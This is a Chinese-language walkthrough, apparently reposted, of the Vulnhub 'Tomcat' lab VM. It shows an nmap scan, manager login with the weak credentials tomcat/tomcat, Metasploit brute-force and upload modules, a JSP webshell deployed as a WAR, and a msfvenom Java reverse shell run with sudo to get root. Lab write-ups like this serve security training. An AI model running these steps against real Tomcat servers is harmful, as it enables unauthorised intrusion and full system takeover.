CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 漏洞列表
  3. 正文

MrLee 小师傅-信息安全公众号

2020年7月23日 477点热度 0人点赞 0条评论

推荐
原创
视频
Java开发
iOS开发
前端开发
JavaScript开发
Android开发
PHP开发
数据库
开发工具
Python开发
Kotlin开发
Ruby开发
.NET开发
服务器运维
开放平台
架构师
大数据
云计算
人工智能
开发语言
其它开发
Lambda在线 > MrLee 小师父 > Vulnhub-Tomcat
Vulnhub-Tomcat
MrLee 小师父 2020-04-10

实验环境

kali攻击机ip:192.168.56.116

Tomcat靶机ip:192.168.56.129

知识点

nmap扫描

Tomcat样例目录session操纵漏洞

Tomcat 后台爆破

Tomcat 后台部署war木马getshell

开始渗透

首先第一步对目标靶机网络端口服务扫描

nmap -A –p- 192.168.56.129

扫描发现开放了22(ssh), 8080(http)端口

打开8080端口是一个tomcat,点击manager app尝试使用弱口令tomcat/tomcat登录成功,也可以使用msf的爆破模块

Vulnhub-Tomcat

use auxiliary/scanner/http/tomcat_mgr_loginset rhosts 192.168.56.129exploit
Vulnhub-Tomcat

登录到后台然后直接上传部署war进行shell,准备一个jsp木马,添加为压缩文件,然后把后缀名改成war,上传部署

Vulnhub-Tomcat

部署成功

Vulnhub-Tomcat

使用冰蝎访问木马 http://192.168.56.129/shell/shell.jsp

Vulnhub-Tomcat

也可直接利用msf的模块

useexploit/multi/http/tomcat_mgr_uploadset httppasswordtomcatset httpusernametomcatset rhosts192.168.56.129set rport 8080exploit

Vulnhub-Tomcat

这里我的不能获取shell

使用冰蝎的虚拟终端,sudo –l发现提权信息

Vulnhub-Tomcat

接下来使用msfvemon生成jar木马,上传到靶机/tmp执行,开启监听端口

kali

msfvenom -p java/shell_reverse_tcplhost=192.168.56.116 lport=1234 -f jar > /root/shell.jar
冰蝎终端

cd /tmpsudo/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jarshell.jar
成功反弹得到root权限

至于session操纵就没做了,应该还有其他漏洞

微信搜索m20151798添加好友0daybank

标签: 暂无
最后更新:2020年7月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me